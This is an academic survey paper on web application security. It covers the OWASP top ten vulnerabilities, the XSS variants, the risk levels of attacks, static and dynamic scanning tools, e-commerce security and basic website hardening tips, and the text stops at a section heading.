Sage Journals: Discover world-class research

Abstract

Web applications play a vital role in modern digital world. Their pervasiveness is mainly underpinned by numerous technological advances that can often lead to misconfigurations, thereby opening a way for a variety of attack vectors. The rapid development of E-commerce, big data, cloud computing and other technologies, further enterprise services are entering to the internet world and have increasingly become the key targets of network attacks. Therefore, the appropriate remedies are essential to maintain the very fabric of security in digital world. This paper aims to identify such vulnerabilities that need to be addressed for ensuring the web security. We identify and compare the static, dynamic, and hybrid tools that can counter the prevalent attacks perpetrated through the identified vulnerabilities. Additionally, we also review the applications of AI in intrusion detection and pinpoint the research gaps. Finally, we cross-compare the various security models and highlight the relevant future research directions.

Keywords

Web security vulnerabilities E-commerce cyber-attacks deep learning

1. Introduction

Web applications are becoming ubiquitous in modern digital world and play a vital role in wide-spread use of E-commerce [169]. The recent COVID pandemic has further highlighted their importance where government, semi-government, and private establishments aim to provide seamless online services to the customers. However, their prevalent usage makes them an attractive target for the malicious attackers who normally aim to leverage the underlying vulnerabilities and misconfiguration in these applications [86]. According to a recent security review by the application defense center, more than 85 percent of web applications are vulnerable to cyber-attacks [6,26,67,119]. In view of this, we begin by presenting a discussion on top ten vulnerabilities as identified by the Open Web Application Security Project (OWASP). Subsequently, we highlight main tools for scanning the web vulnerabilities i.e., OWASP, Web Application Protection (WAP), and (Re-Inforce PHP Security) RIPS [163].

The OWASP is serving as a core foundation to handle the security issues therefore it is widely being used in web securities. The authors utilize two free source tools for scanning for web vulnerabilities: OWASP, WAP and RIPS [163]. In addition to these tools, we also identify various other approaches that can improve the scanning accuracy. These include static and dynamic code analysis [103,142], Machine Learning (ML) based approaches, and many penetration testing tools [179]. We also compare static and dynamic analysis techniques which are fast and promising for detecting vulnerabilities and can effectively work with penetration testing tools. The use of various testing methodologies is critical in order to uncover software faults early in the development process and to prevent unauthorized access. The authors conduct test automation exactly for web applications by introducing planning models for attacks and their use in online application testing [20]. People must understand how to protect their websites from attacks, as well as the credentials which they are using on several websites. The top ten methods that every website developer and the owner should use to protect the websites include updates, passwords, and many other techniques by which we can secure our website from different types of attacks [107]. E-commerce security is another essential aspect of web security or web application security. The article also discusses E-commerce security because of growing attack and security issues. The popularity of websites worldwide causes an increase in electronic business and online transactions.

This paper addresses the wide-ranging vulnerabilities, web securities and their impacts on E-commerce. It also provides a survey of vulnerabilities, comparing tools, threats, and several ways to secure the web and avoid vulnerabilities. In the last decades, ML and Deep Learning (DL) have revealed significant progress for web security. Therefore, we have discussed several approaches based on DL and ML. Further, we have discussed several open problems which can be addressed for more secure and vulnerability-free systems.

The rest of the paper is organized as follows: Section 2 describes the basic theory behind the advance web security and vulnerabilities. Section 3 is based on the types of web securities. Sections 4, 5, and 6 are based on attack impact, comparison of tools, and security threats, respectively. Section 7 thoroughly studies E-commerce security related to its purpose, issues, tools, and secure techniques. Section 8 discusses several ways to secure web and state-of-the-art methods based on ML and DL. Sections 9 and 10 confer the overall issues and conclude the paper.

2. Theory of web security and vulnerabilities

Network Security Situation Awareness (NSSA) refers to acquiring and understanding network security elements, assessing the current network security situation, and predicting the future network security development trend [24]. In recent years, the Internet has developed rapidly, and more and more new concepts have been put forward, including “Internet of Things (IoT)”, “big data”, “cloud computing” etc. Many researchers have strengthened cybersecurity research and vigorously made several developments [69,78,91,93], including critical national information infrastructure network, spatial information infrastructure, military information infrastructure, smart city, Internet of Things, autonomous driving, etc. In the mid-1990s, attacks on web applications began nearly immediately after the inception of the worldwide web. Web application issues have become the most common factor of enterprise security breaks [75]. The web application is an essential feature because of its versatility in providing social services. The web application has rapidly grown into one of the most widely used technologies [169]. Web applications have become a popular target for internet attackers because of their growing popularity and complexity. Even with the assistance of security experts, it is still challenging to manage due to the complexity of penetration testing and code review procedures. It requires many testing methods in code review and penetration testing, and most websites are hacked daily [8].

Users’ accounts and other information are now susceptible to fraud and many other risks as more customer data is transferred online through digital purchases or remittance activities [132]. Many web services that handle payments online are more likely to attack than other websites. If data is lost or altered, the consequences are more severe. The fear of credit card numbers or stealing sensitive information is a primary factor that makes websites less attractive [150]. Consumers are also concerned about web security attacks, which have led to a lack of trust in the industry. The number of articles published since 2012 with the title web security or vulnerabilities according to Google scholar metrics, have been shown Fig. 1. Due to its importance in the current era of multimedia, it is required to explore it more and provide valuable solutions for the current limitations.

Fig. 1.

Published articles since 2012 with the title web security / vulnerabilities.

As a consequence of it, numerous business owners, as well as internet users, are feeling unenthusiastic about adopting this new technology. Privacy and security are critical factors because the commercial sector is paying close attention to the privacy and security sector since it has the potential to ensure whether a business is successful or not [162]. According to the Web Application Security Consortium (WASC) report, nearly 49% of websites have threats and risks with a high severity level, and 13% of websites are automatically compromised for security issues [23].

2.1. Architecture of the website

Figure 2 demonstrates a website’s basic logic and an internet application with a client interface and a server end on a web server. It is accessible via a Uniform Resource Locator (URL). The name of the internet server is understandable; TCP is the transport protocol used by the browser (clients) and the server to communicate. It is the basic architecture of data flow in a web application. HTTP is the transport protocol; CSS: data format; and HTML is the hypertext mark-up language. The user clicks or enters a URL. Then clients send an HTTP request via a communication protocol. The browser gets the outcome from the server-side and returns an HTML (i.e., web pages) output page to the user, which the client’s browser displays as a site [10].

Fig. 2.

Architecture of the website.

2.2. Cyber security vs web security

Web security and cyber security are closely related but distinct fields. Both are concerned with protecting computer systems and networks from unauthorized access, but they have different focuses and approaches [42,137]. Web security is specifically focused on protecting web applications and the data that they handle. This includes preventing SQL injection attacks, cross-site scripting (XSS) attacks, cross-site request forgery (CSRF) attacks, and other types of attacks that target web applications. Web security also includes protecting against malware that is distributed through the web and safeguarding against phishing and other types of social engineering attacks.

Cyber security, on the other hand, is a broader field that encompasses web security as well as other types of security concerns. It involves protecting all types of computer systems and networks from unauthorized access, including not only web applications but also desktop software, mobile devices, and IoT devices [80]. Cyber security also includes protecting against advanced persistent threats (APTs), nation-state cyber-attacks, and other types of sophisticated cyber-attacks [9]. One key difference between web security and cyber security is that web security is mainly focused on protecting the client-side of the application while cyber security is focused on protecting the whole infrastructure. Another key difference is that web security is mainly focused on protecting against known vulnerabilities and attacks, while cyber security is also concerned with identifying and mitigating unknown threats. Cyber security also includes incident response and disaster recovery planning, as well as compliance with regulations such as HIPAA, PCI-DSS and others.

Web security and cyber security also use different tools and techniques. Web security tools include web application firewalls (WAFs), intrusion detection and prevention systems (IDPSs), and web vulnerability scanners. Cyber security tools include firewalls, intrusion detection and prevention systems (IDPSs), antivirus software, and network security monitoring (NSM) tools.

2.3. Artificial intelligence and web security

Artificial intelligence (AI) plays a critical role in web security, helping to protect against a wide range of cyber threats [106,128]. One of the key ways in which AI is used in web security is through the development of sophisticated algorithms that can detect and respond to suspicious activity on a network [71]. These algorithms are able to analyze large amounts of data in real-time, looking for patterns that indicate a potential threat. They can also learn from past incidents, becoming more effective over time at identifying new and emerging threats. One example of how AI is used in web security is through the development of intrusion detection systems (IDS) [180]. These systems use machine learning algorithms to analyze network traffic and identify suspicious activity, such as attempts to exploit vulnerabilities or access sensitive data. They can also be configured to respond to threats in real-time, blocking malicious traffic or isolating affected systems to prevent further damage.

Another way in which AI is used in web security is through the development of advanced antivirus software [109]. These programs use machine learning algorithms to identify malware and other malicious software based on their characteristics and behavior. They can also be configured to update their databases with new malware signatures in real-time, ensuring that they are always able to detect the latest threats. AI is also used in web security through the development of behavior-based detection systems. These systems analyze the behavior of users and devices on a network, looking for patterns that indicate suspicious activity. For example, a system might flag an account that has been accessed from multiple locations in a short period of time, indicating a potential account takeover.

In addition to these specific applications, AI is also used more broadly in web security through the development of automated incident response systems. These systems use machine learning algorithms to analyze large amounts of data from a variety of sources, such as network logs and security cameras, to identify potential threats. They can also be configured to respond to incidents in real-time, triggering security measures such as isolating affected systems or escalating the incident to human security teams for further investigation. AI is also used in web security to identify and protect against Advanced Persistent Threats (APT) [9]. These are cyber-attacks that are typically carried out by nation-states or other highly-skilled adversaries. They are typically characterized by prolonged and stealthy access to a target network, during which the attacker seeks to gain access to sensitive data or disrupt operations. AI-based security solutions can help detect APT by analyzing network traffic and identifying patterns of behavior that indicate an APT is in progress. They can also be configured to respond to APT in real-time, taking actions such as isolating affected systems or escalating the incident to human security teams for further investigation. Another way AI is used in web security is through the development of threat intelligence platforms. These platforms use machine learning algorithms to analyze data from a variety of sources, such as social media, dark web forums, and other open-source intelligence. They help to identify potential threats and provide actionable intelligence that can be used to protect against them.

3. Types of security vulnerabilities

Vulnerability is defined as a set of circumstances that leads to and may lead to an information system’s implicitly or explicitly failure confidentially, integrity, or availability [75]. According to the report, nearly 9/10 percent of vulnerabilities are found during the development phase because of paying no attention to known vulnerabilities in another information system [102]. According to the report, the ten most commonly used vulnerabilities are responsible for 3/4 percent of violations in today’s software applications. The OWASP most frequently used vulnerability project, emphasizes identifying the most severe threat to a wide range of people. In other words, if developers are aware of these ten vulnerabilities, it is possible to avoid a large number of them. These flaws can be complicated and appear under a variety of circumstances. Using a web application firewall may minimize the effect of some activities, but it does not address the primary vulnerabilities [44]. We highlight a few common attacks in a web application, like Cross-Site Scripting (XSS), browser attacks, and cookie-session hijacking [76]. SQL injection and XSS are those security issues that are commonly encountered in web applications [19,35,99,122]. We have discussed the top ten mostly used vulnerabilities of the OWASP. According to OWASP, the top ten vulnerabilities are shown in Fig. 3.

Fig. 3.

Top ten vulnerabilities.

3.1. SQL injection

A remote code execution technique allows attackers to obtain critical data from the web servers’ database. The attacker successfully launched this attack because user inputs are not properly validated before being sent to SQL queries. An attacker can easily manipulate query results using SQL keywords with user inputs [154]. SQL injection usually happens due to including user input data to the interpreter in the form of the command. The attacker forces the interpreter to run these queries to acquire access to the user’s sensitive information without his awareness [126]. SQL injection can cause authentication bypass, data loss, denial of access, and the destruction of the entire database or host takeover.

3.2. Broken authentication and session management

Another widespread shortcoming in the OWASP list is session management, which comes across due to flaws in the implementation of session management in web applications. This vulnerability (broken authentication) allows attackers to steal keys, passwords, credit card numbers, and session IDs due to improper function implementation, such as management and authentication. This attack can be caused by misconfiguration, such as storing passwords in plain text or storing users’ credentials with weak encryption. According to the OWASP, these two attacks can be caused by ineffective password management, logout mechanisms, forget pass, and other similar features [155,157]. Users are the ones who implement strong authentication and session management controls [55].

3.3. Cross-site scripting

The XSS is considered one of the critical threats to the security of web applications. XSS attacks are web application attacks caused by improper validation and sanitation of inputs provided by users. Such an attack allows the attackers to run malicious scripts on the browser to steal cookies and hijack user sessions [43,45]. Session hijacking, sensitive information disclosure, perimeter defense bypassing, and site trusting are possible outcomes of XSS. These scripts can change the content of a page by rewriting the HTML.

The following are the steps that hackers take in this attack [144]:

Identify vulnerable websites and issue the necessary cookies.

Create malicious code and test it to ensure it works as expected.

Create URLs; users can also include the code in web pages and e-mails.

Encourage users to run the malicious code, which will result in the account being hijacked or collecting sensitive data.

XSS attacks are classified into four types:

Stored (persistent)

Reflected (non-persistent)

Induced XSS,

Dom-based XSS.

The first two are still the most popular XSS attacks, while the remaining three are less well-known.

3.3.1. Stored XSS

This vulnerability is activated when the injected suspicious code is stored indefinitely on the victim’s servers. First, the attacker tries to find a weakness in the software system to inject malicious code. Then The attacker grabs the user’s personal information, which may lead to serious damage [94]. When a client uses information through a web-based application, the attack is triggered, giving the attackers to gain access to it. According to [166], store XSS is more dangerous than other types.

3.3.2. Reflected XSS

Reflected XSS attacks are different from previous XSS attacks. These attacks target web application features that repeat data provided by the client, such as forms. Because the injected code could not be found on the server, the attacker generates a crafted Link with suspicious script code, leading the suspect to think the Link is legitimate genuinely [167]. When the user visits the web page via a click on the provided Link, the malicious code is sent towards the attacker’s servers then this attack will be launched on the targeted browser using a script.

//When the user clicks on the Link, the injected code is sent to the attacker’s web server, and the attack is launched on the target browser.//

3.3.3. DOM-based XSS

This attack is launched on the client-side, similar to the reflected XSS. A significant variance is that the attack codes are not embedded in the HTML content sent back by the server. As a result, all server-side detection mechanisms fail (e.g., session cookie or form field). Such vulnerability may be activated when the active content (e.g., JavaScript function) is transformed by a created request, letting an attacker use a DOM element [94,134,166,167].

3.3.4. Induced XSS

The web server has a vulnerability known as HTTP response splitting in induced XSS [134]. An attacker can use this vulnerability to modify the web page by interrupting the server’s header. This can be accomplished by looking for an invalid request parameter in the HTTP response headers [73]. XSS is a commonly exploited security weakness in modern websites [141]. Stored and reflected vulnerabilities can be found in both server and client-side code. On the other hand, DOM-based is only detected on the client-side [94]. Detecting XSS vulnerabilities has received a lot of attention. However, researchers are still trying to develop a reliable and appropriate method for analyzing source code and detecting XSS vulnerabilities in web applications [143,161].

3.4. Insecure direct object references

Generally, it is created due to internal implementation objects such as database keys, files, etc. Regardless of any protection mechanism, an attacker can control these references to steal illicit data [44]. For example, consider the case where a repository or login information file that should only be accessible by network administrators is made available to other users on the network. In the non-existence of the access control check, unauthorized access to these resources could often be attained by handling URL parameters [65].

3.5. Security misconfiguration

A well-defined security configuration must have been required for web applications and their corresponding web servers. In most cases, the default security configurations are insecure. For example, default passwords, accounts, and enabled directory listing are options. Furthermore, secure mechanisms should be up to date. According to OWASP, external and internal attacks can be enabled by security misconfigurations, resulting in unauthorized access or system compromise [10,36].

3.6. Sensitive data exposure

The passwords and cookies are exchanged between the browser and the server, requiring extra security because they are sensitive to the user [87]. Sometimes sensitive information is left unprotected on the web applications; attackers can easily steal or change this information and utilize it to gain access or conduct unauthorized transactions. The use of encryption schemes that are not secure can also expose sensitive information. An attacker can also use sensitive information to manipulate a web application or discover other accessible vulnerabilities [44,48].

3.7. Missing access level control

It mostly occurs when users access restricted resources/private data even after not being properly authenticated. If a web application cannot control the resource access system, then attackers could easily get this to use limited resources; also, attackers can modify data on the server, which is harmful. It could seriously damage the data integrity. Security controls should be in place to ensure that a user is authenticated and has the appropriate access rights, especially for web applications with multiple users with different roles [1,23].

3.8. Cross-site request forgery (CSRF)

CSRF is one of the unique attacks that deceives an attacker into performing malicious actions on a website where he/she is currently a legitimate user. In contrast to XSS, CSRF takes advantage of a site’s trust in a browser. Because trust exists and the website is compelled to carry out these requests. On the other hand, malicious users create fake HTTP requests and trick victims into transmitting these forged requests using various techniques [44,98].

3.9. Components with known vulnerabilities

Web applications that use a variety of components, such as modules, libraries, and a wide range of supporting frameworks, run with full rights. Moreover, if an attacker successfully manipulates the vulnerability component, sensitive data can be lost due to the attack. Integrating these components with known vulnerabilities into a web application may result in a broader range of attacks by weakening the web application’s defensive measures [44].

3.10. Unvalidated redirects and forwards

Attackers can utilize this approach to redirect sufferers to malicious websites because usually, user data is not properly validated or invalidated. Forwards can also be used to gain access to restricted pages. Due to insufficient mechanisms, attackers can normally redirect malicious web requests to phishing or other malicious websites. This may affect data confidentiality [10,44,102].

4. Attack impacts (low, medium, high)

The impacts of threats are determined by the methods, targets, mediums, and magnitude used in carrying out the attacks. As a result, the attack implication must be addressed to identify the risk type of the threats explained in the research. It will be relatively simple to prioritize protective mechanisms to overcome risk factors. We can categorize the attack impact into three risk levels based on the information: high, medium, and low. We assorted every threat consequence previously using the OWASP risk rating methodology. There are two possible outcomes to consider in this approach: commercial and technical developments. The technological impacts could be measured using information security statistics like confidentiality, integrity, and availability. On the other hand, the commercial impacts can be altered depending on the state of each organization. We evaluate the technical consequences of malicious activities due to this limitation. The percentage of attacks based on risk level is related to Transport Layer Security (TLS) and websites. It specifies there are twenty-six different cyber-attacks, in which high-risk cyber-attacks are ten, medium-risk is eleven, and low-risk are fifteen [169].

4.1. High level

This level relates to attacks that cause significant information leakage, honesty, or ease of access. TLS attacks are the major source of concern in terms of confidentiality. In the meantime, session management will be a primary concern of identity verification failure. Due to this reasoning, web applications can be divided into two types; Man-In-the-Middle (MITM) and Browser Cache Poisoning (BCP). The MITM and BCP seem to be closely correlated techniques that increase the risk of client-server authentication breakdown. To use this attack, the attacker can completely deceive an entity or alter the source’s legitimacy. It will eventually result in a loss of security and privacy. This MITM and BCP position violates both information and connection integrity in terms of integrity. An attacker can modify any message without leaving any marks on the client or server side.

4.2. Medium level

There is another security weakness that belongs to the medium level. The developer’s approach to avoiding robust encryption mechanisms puts the user at risk. The accumulation of a session mechanism generally supports the partially enforced encryption. As a result, a potential attacker would struggle to defeat such a mixed mechanism. These criteria also include poor cookie implementation, which results in cookie misconfiguration. Even if an attacker successfully bypasses the secure and HTTP Only flag mechanisms, stealing the cookie is difficult. This process also puts users’ Personally Identifiable Information (PII) at risk by checking browsing history, such as e-mail information. As a result, the confidentiality of the data is adversely affected.

4.3. Low level

This category includes attacks that have directly affected data usage, data loss, or modifications of the user’s data caused by weak security authentication or security headers such as HTTP Strict-Transport-Security, Content Security Policy (CSP), and HTTP Public Key Pinning (HPKP). Poor implementation of HSTS and CSP has little impact on confidentiality, apart from a MITM case already discussed in the above high-level category. Because HPKP is not configured correctly, an attacker can attack the system’s authenticity or integrity.

5. Comparison between static, dynamic, and hybrid tools

Dynamic analysis is unable to obtain optimal code coverage with low accuracy, whereas static analysis can. Several research findings have already tried combining these two methodologies to reduce their drawbacks and enhance their benefits [183]. Static analysis is a set of approaches for predicting the dynamic aspects before execution. These are the critical advantages of static analysis, which cannot require the application’s deployment and implementation. i.e., the static analysis will not provide any false negatives. On the other hand, during code execution, the dynamic analysis contains a set of tests to detect vulnerabilities and prevent attacks. False positives are reduced because this is performed on “live” websites. However, it is vulnerable to false negatives [30].

These tools can be compared by installing vulnerable applications in various programming languages. SQL injection, directory traversal, XSS, and SQL command injection are possible. The vulnerability of apps was analyzed using dynamic tools such as App spider and Burp Suite Pro on a Windows workstation. Those launched on a Windows operating system with Java (i.e., Tomcat) and a Linux server with a PHP interpreter. The result is a report with all details after completing the scanning process. It can be where the vulnerability was discovered, the time taken to scan the program, etc. A scanner comparison is performed based on the report.

In the static approach, the static tools scanner can be instigated directly on a local machine/Linux system and scan the weak application manually using the time frame. After it completes analyzing, it provides a detailed report of results, and explore the outcomes based on the information. For example, a static scanner, such as a sonar cloud scanner, can be accessed via the internet. After the scanning, the scanner generates the report with the complete information which is required. Finding a bug is an IDE software plug-in that detects weak apps and creates a notification if the code includes vulnerability. The code can discover the vulnerability after recording the plug-in’s completion time. The hybrid method combines dynamic and static approaches to control the vulnerabilities mentioned above. However, they also share their drawbacks and are inefficient in practice [174]. The significant increase in vulnerabilities shows that present code evaluation and software quality assurance approaches must be enhanced in capability and reliability [164].

6. Security threats

Web services introduced new forms of threats or attacks. Security risks can be divided into the following few categories.

Denial of Services

Unauthorized Access

Identify Spoofing

Security (Theft and Fraud)

6.1. Denial of services

Website technologies are well recognized for detecting standard denial of service activities. This attack halts a system or infrastructure from working correctly. It is usually performed by sending multiple requests to the application. If the application receives more requests than it can manage, it will hang, and the user will be incapable of exploiting the service [16]. A distributed denial of service describes where more computers are employed to cause a denial of service [155]. DOS attacks are classified into spamming and viruses [116].

Spamming: Sending spam and phishing e-mails to people. When a hacker attacks a machine or server and sends hundreds of e-mails to it, this is known as e-mail bombing.

Viruses: Software applications that are self-replicated and configured to perform unwanted activities.

6.2. Unauthorized access

It refers to unauthorized access to systems, applications, or data. We must ensure that no information is accessible to unauthorized users when designing and implementing a web application. We should use strong authentication and authorization to authenticate and authorize the service customers. We can avoid this by preventing sensitive information from passing through SOAP headers and using strong encryption techniques to encrypt the communication channel [150].

6.3. Data alteration and message reply

Data Alteration: Data alteration is a modification of data. It means that the information in web service messages is intercepted between the sender and receiver. Data is modified by unauthorized access before sending it to the final destination.

Message Reply: Copying original messages and forwarding them to service multiple is considered a replay attack. In some ways, web services make replay attack much easier to detect because payload information is more easily accessible if we use rights tools.

6.4. Identify spoofing

The technique of making someone fool is known as spoofing. It is the most popular method of attack on a system that uses user credentials. The illegal usage of a user’s credentials via web services is identity spoofing.

6.5. Security (theft and fraud)

We already discussed data theft in unauthorized access

When someone uses stolen or modified data for the wrong attention, then fraud occurs.

Theft of software through unauthorized copying from a company’s server

Hardware like laptop theft.

7. E-commerce security

7.1. Digital E-commerce cycle

A high level of security is required for shopping and E-commerce websites. Many products are now ordered online via websites because it is a very convenient and straightforward way to purchase goods, including clothing and automobiles. Popular websites include Amazon, E bay, Best Buy, and many others [13]. The Internet has suffered various network attacks, threatening everyone’s network information security. If someone does not pay attention, it may bring severe economic losses and even affect the network security of the whole country. For example, Ctrip, a well-known tourism website in China, suffered an unknown network attack in 2015, which led to the direct downtime of the company’s servers for up to 12 hours. Besides, the United States encountered the most significant DDoS attack in history, involving companies including Google, Facebook, Twitter, and other well-known enterprises. It directly led to the “disconnection” of half of the country. In 2019, the Amazon AWS DNS service (i.e., route 53) was attacked by a distributed denial of service (DDoS). The attacker sent a large amount of useless data to the server, resulting in a slow response and even server downtime. By sending a large amount of meaningless data, an attacker can run his process on TSIG configuration, causing the binding domain name resolution server to crash.

Many companies are taking advantage of E-commerce opportunities. The main reasons for grabbing businesses’ attention are high efficiency, low cost, and more profitability. Still, security issues in E-commerce are a significant cause of loss and make websites less attractive [22]. In E-commerce security, several key prospects need to be analyzed for the security purpose, such as computer security, data security, network security, and so on. Because of its unique structure, one of the most apparent security components can impact the end-user through everyday payment interaction with business [116]. Data loss is a crucial concern in E-commerce websites because E-commerce deals with online shopping and payments by debit, credit cards, and PayPal, increasing website risk. Web mining technologies can also use to improve the security of E-commerce websites. The relationship between web data extraction privacy and E-commerce is observed using online user behavior. E-commerce websites are secured using a variety of web mining techniques and security algorithms [3,90,96,118].

A risk assessment model has been designed using the Fuzzy Inference System (FIS). The model generates risk assessment results based on four risk factors: vulnerability, threat, possibility, and influence. Finally, the feasibility of the model is verified [5]. Hu et al. established a quantitative security risk assessment model. The model predicts the threat to network security based on the dynamic Bayesian attack graph and then performs the quantitative assessment of security risk based on the threat prediction [54]. An evaluation index system was proposed for enterprise cloud accounting risk evaluation, which divided the risk evaluation into internal and external service factors, subdivided into the standard layer and index layer [32]. Han et al. aim at the security problems in the cloud IoT based on the three-layer index system of Software Defined Network (SDN). The assessment is divided into the non-overlapping perception layer, SDN layer, and cloud application layer according to the cloud IoT architecture [47]. Some researchers have also established an evaluation index system from the perspective of specific network attacks. To quantify the attack effect of Advanced Persistent Thread (APT) and the ability to visualize APT; the authors built an index system based on APT’s persistence, concealment, diffusion, and intractability characteristics [85]. The entire digital E-commerce cycle is shown in Fig. 4.

Fig. 4.

E-commerce cycle.

7.2. Purpose of E-commerce security

7.2.1. Data confidentially

It involves securing valuable data from unauthorized access by a third party, as shown in Fig. 5. Basically, it provides encryption/decryption [13].

Fig. 5.

Confidentially.

7.2.2. Authentication

Digital signatures are utilized to authenticate the person’s identity who wants to use the service, and basic authentication is shown in Fig. 6. In other words, authentication means verifying the sender’s identity. A message authentication code (MAC) is one of the most common algorithms used to authenticate a message [72].

Fig. 6.

Authentication.

7.2.3. Access control

It controls those features which a user needs to access. Valid credentials are required [123].

7.2.4. Data integrity

It makes sure that the data has not been altered. It has been achieved through the use of a message digest or hashing. Integrity is a method of maintaining the data’s trustworthiness, consistency, and accuracy throughout its life cycle, as shown in Fig. 7. It also refers to the process of protecting data from unauthorized modification. This can be done in a network by implementing a hashing algorithm like the Secure Hashing Algorithm (SHA) [34].

Fig. 7.

Integrity.

7.2.5. Non-repudiation

It is not essential to reject a sale or purchase using a digital signature, as shown in Fig. 8. Alternatively, it defines a service that can prove the data’s integrity and origin [177].

Fig. 8.

Non-repudiation.

Plaintext/Cleartext – Readable message by Humans.

Ciphertext – unreadable, uses encryption and decryption.

The whole encryption-decryption process is shown in Fig. 9. A cipher is a cryptographic process and a mathematical operation. Typically, most attacks aim to locate the keys, and sometimes it can lead to catastrophes on success.

Fig. 9.

Encryption and decryption process.

7.3. Issues in E-commerce security

The security of E-commerce assets against illegal entry, usage, variation, or damage is known as E-commerce security. While security features cannot guarantee a secure system, these are necessary for its progress. The given security protocols should be considered for robust E-commerce security:

Authentication: It authenticates that you are the person you claim to be. It guarantees that the user is the only one who has access to his online bank account.

Authorization: Users are the only one who has the power to alter their funding in a particular way. It prohibits the user from adding money to his/her account or deleting an invoice.

Encryption: It deals with hiding personal information from the attacker. It keeps you safe from fraud while you are doing online banking.

Auditing: It stores and maintains all record information. Merchants utilize auditing to verify that you bought an exact item.

Availability: Preventing data delays or deletion.

7.4. E-commerce security tools

Our computer becomes vulnerable to cyber-attack when we link it to a network. A firewall system protects our computer by redistricting all types of traffic that our computer initiates and directs [152]. Some essential firewalls are listed below:

Infrastructure with Public Keys

Software for encryption-Encryption is the transformation of essential data in any structure into a structure that must be delivered clear with the help of a decoding key

Digital certificates (Certificates of authenticity)

Digital Signatures (Signatures in digital form)

Bio-metrics – Eye scanner, fingerprints, etc.

Passwords

Bars and locks – Center for Network Operations

Secure Protocols (Protocols for providing security)

7.5. Data mining techniques to secure E-commerce website

We can secure E-commerce website using the web mining techniques and can evaluate the relationship between web mining and security based on user behavior. Web mining belongs to data mining, which automatically searches and collects information across web documents. Web mining is a news service center that provides information, E-commerce data, financial management, and other services. Web mining frameworks can be used to evaluate E-commerce websites. In general, web mining can be classified as follows:

Web Structure Mining

Web Content Mining

Page rank and trust rank algorithms are the most popular techniques in web mining.

7.5.1. Web structure mining

At this stage, we need to examine a website using both algorithms. A page’s rank is determined by its link structure rather than its content. The trust rank is an algorithm to evaluate website quality. The outcome is a quality-based score that demonstrates the website’s level of trustworthiness. The first step is to collect information from websites and store it in a web storage system [96].

A. Page Rank Algorithm

A search engine utilizes the page rank algorithm. We can determine a website’s page rank by decoding web pages for specific Links, computing the page rank incrementally, and sorting the documents using a page search ranking engine.

B. Trust Rank Algorithm

The trust rank algorithm is a method for determining the quality of websites by generating a measurement for page quality based on the linking structure. The trust rank algorithm procedure is given below:

The selection of trustworthy web pages is the starting point.

By linking to other pages, trust can be transferred.

Trust spreads in the same way that Page Rank does.

The negative form of measuring propagates reverse, indicating flawed pages.

The ranking algorithm can consider both measures.

7.5.2. Web content mining

Finding new information from a website is called web content mining. The user gets information about any topic according to his/her choice. Web content mining phases can be classified into hierarchical clustering and K-mean clustering.

A. Hierarchical Clustering

It is one of the bottom-up clustering methods in which clusters have many sub-clusters. It begins with each object within a single cluster. It agglomerates with the closest pair of the clusters in each subsequent iteration based on some standard features until all information collects in one cluster. It can generate an object order that could be useful to display data. On the other hand, smaller clusters form, which may aid in the discovery process.

B. K-Means Clustering

It’s a clustering technique that divides an observation into k-clusters, with each observation belonging to the specific cluster with the closest mean. K-means might be more highly scalable than hierarchical clustering (i.e., when K is small) while dealing with many variables. K-Means clustering might generate tighter clusters than the hierarchical clustering if the clusters are globular.

8. Ways to secure web and avoid vulnerabilities

8.1. How to improve the website?

Web Applications make things very easy for companies, and any company can easily create an online presence quickly. Because of their excellent and flexible structure, control unit, and enhanced version of websites make it easy to run a website without even requiring any training or having expertise. It is suitable for business and many other purposes, but there are also some drawbacks. Many website owners don’t know how to secure their websites from cyber-attacks; they do not know the importance of web security. Here we highlight a few points that all website holders and developers should know to secure their websites from attack [107,111].

8.1.1. Update

Every day, many websites are being hacked because of software vulnerabilities and less secure security mechanisms. It is imperative to keep your website up to date. Many attackers use advance techniques on vulnerable websites and the systems continuously scan every website to get the hacking opportunity. It is not adequate to update once a week or month because current developed systems detect the vulnerability quickly and accurately. It is possible that one of them finds a vulnerability before a user could fix it. Exception, users have a website firewall installed such as Cloud Proxy and have up to date with the latest versions.

8.1.2. Passwords

Continuing to work on client sites commonly requires logging in with their admin user credentials to their sites. We have only concerned about the vulnerabilities of their root passwords. Using ubiquitous names like admin as usernames and passwords is not considered a good security practice. If you use the most common password for a website, your website has many chances of getting hacked because of a weak password policy. The following three vital requirements must always be met when choosing a password:

COMPLEX: Random username and password must be created.

LENGTH: The length of a password must be at least 12 characters.

UNIQUE: Passwords should not be reused, use a different password for each account.

8.1.3. One site = one container

A most important point to understand is if you want to host multiple websites on a single server, then tactlessly, this is one of the worsts and most dangerous security practices. The hosting of multiple websites on a single server indicates greater security threats. So, we prefer to use one server only for one website; it may reduce security threats.

8.1.4. Sensible user access

This rule is only for that website, which has multiple users. Every user must require permission to complete their tasks. If someone needs temporary access for a specific task, approve them, but once the task is completed, they must terminate their access. It will make it worth-fully.

8.1.5. Change CMS settings

While today’s applications are simple to use, they can cause a threat to end-users. The large numbers of attacks on websites are usually automatic using Bots or other automated systems, and many attacks are driven by their default settings. If you want to avoid most attacks, change their default setting while installing your preferred software.

8.1.6. Extension selection

Nowadays, one of the critical aspects of web applications is their extensibility. Most people are unaware that the same extensibility is also its main weakness. How do you know which extension to install when there are several that provide similar functionality? Here are the factors we consider while choosing the extension; check the extension updates history when it was last updated. Must prefer to use the extension which is up to date because it indicates if any security issue or bug is found in it, they just fixed it accordingly.

8.1.7. Backups

Every website requires backup because it is essential for a website, but if you want to store a backup on the server, it will create a severe security risk. Backups contain the unpatched software version and are publicly available, making it easily accessible for a hacker.

8.1.8. Server configuration files

We should spend some time getting to know the webserver configuration files. The “apache2.conf/httpd.conf” file is used by Apache webservers, the Nginx server uses “Nginx.conf”, and Microsoft IIS server uses the “web.config”. All files which are located on the source web directory are compelling. It lets you run server rules properly and enhances web security. Here are a few guidelines:

Avoid directory browsing

Avoid image hotlinking.

Protect sensitive files

8.1.9. Install SSL

We explored many articles where they explained that using SLL would solve all their security issues. Still, it is utterly wrong because SLL has nothing to do with website security, and SLL does not protect websites from malicious attacks. SSL provides strong encryption between the server and the browser. One of the important reasons behind this encryption is that it prevents the traffic from intercepting, so the SLL server and browser communicate smoothly. SSL is significant for the security of many websites and online buying selling websites that handle online payments and sensitive information.

8.2. Avoid vulnerabilities

8.2.1. Protection against injection attack

